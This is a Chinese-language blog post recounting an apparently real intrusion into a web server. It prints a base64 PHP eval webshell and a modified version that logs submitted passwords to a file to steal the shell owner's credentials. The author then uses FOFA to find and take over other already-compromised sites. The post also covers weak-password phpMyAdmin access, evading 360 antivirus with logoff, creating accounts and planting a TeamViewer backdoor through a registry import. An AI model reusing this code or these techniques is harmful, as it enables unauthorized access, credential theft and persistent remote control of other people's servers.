前言
有一次滲透中遇到了一個一個網站,上面只有一個imgaes.php的shell和一個別的一句話木馬還有一個phpmyadmin,於是搞下來了一大波網站,還總結了一系列的猥瑣滲透手法,可能已經被隱跡於各處的大牛用了,但是還是放出來讓大家玩玩吧,沒技術含量,大牛勿噴
正文
這樣就沒轍了麼,首先弱口令root/root進了phpmyadmin,可惜現在那幾個拿shell的方法都掛了,並且images.php和另一個shell也沒那些順便寫進去的路徑和sql查詢語句什麼的,像這樣
也沒phpinfo.php之類的,也不知道路徑,更懵逼了,然後用burp爆破了一波另一個shell,把密碼給爆破出來了,單字一個h,然後進去先沒提權,看了看images.php的源碼,如下
?>
整理一下就是執行後面這個字符串base64解碼之後的語句,即
@session_start();
if(isset($_POST['code'])){
(substr(sha1(md5(@$_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
@eval(base64_decode($_SESSION['theCode']));
}
這就不用我多解釋了吧,a就是密碼,code是語句,用菜刀還有個base64簡單混淆,但是這尼瑪密碼MD5了又sha1的,我是密碼學小白啊,咋破解,隨手在fofa上搜了一搜這個shell,一大堆,於是猜測這個人根本不去一個一個提權什麼的,他肯定不看,就用批量工具搞,於是,images.php的源碼被我無情的改成了如下,
$f=fopen("sayhi.txt","w+");
fwrite($f,@$_POST['a']."[nmsl]");
fclose($f);
session_start();
if(isset($_POST['code'])){
(substr(sha1(md5($_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
?>
出去浪了幾天回來一看sayhi.txt,就搞到密碼了,有了密碼你懂的,改改菜刀的配置文件,以後再說吧,先提提權玩玩
C:\windows\system32目錄不可訪問,於是上傳了個cmd.exe
Netstat -ano看見是開著3389的,於是直接創建賬戶,輸入了一條命令後,就超時了,whoami,返回system,不科學啊,然後再tasklist一看,360這個惱人鬼在這裡,然後仔細一看,httpd運行在0號賬戶,360運行在2號賬戶,我是個小白啊,不可能逆向手段過硬能去殺死360,於是logoff 2
360沒了,創建賬戶自然也不是難事兒了
既然有了images.php的密碼,於是在fofa上搜了幾個shell練手,遇到了幾個開著3389卻在內網的,並且外網開放的端口就一個web服務,還有360,360還和httpd運行在同一用戶下,這還搞個雞毛,我又不是免殺大牛,上傳個馬子肯定被殺,想起幫別人修電腦一直在用teamviewer,360沒爆過毒啊,於是研究了一番,一開始研究的新版本的
首先在程序安裝目錄裡有一個rolloutfile.tv13,裡面存著用戶id,這就解決了用戶名,然後搜了搜teamviewer的註冊表項,如下
Teamview設置裡有一個設置密碼為固定密碼的地方,設置好了固定密碼之後,註冊表裡就是這樣的,有認證方式的配置,有加密以後的密碼,於是把這個保存出來,把teamviewer上傳到目標主機,然後改一下id再regedit /s 1.reg就好了
因為teamviewer的東西太多了,打包一下,然後上傳個windows版的busybox,用busybox unzip解壓一下就好了
文章僅用於普及網絡安全知識,提高小夥伴的安全意識的同時介紹常見漏洞的特徵等,若讀者因此做出危害網絡安全的行為後果自負,與合天智匯以及原作者無關,特此聲明。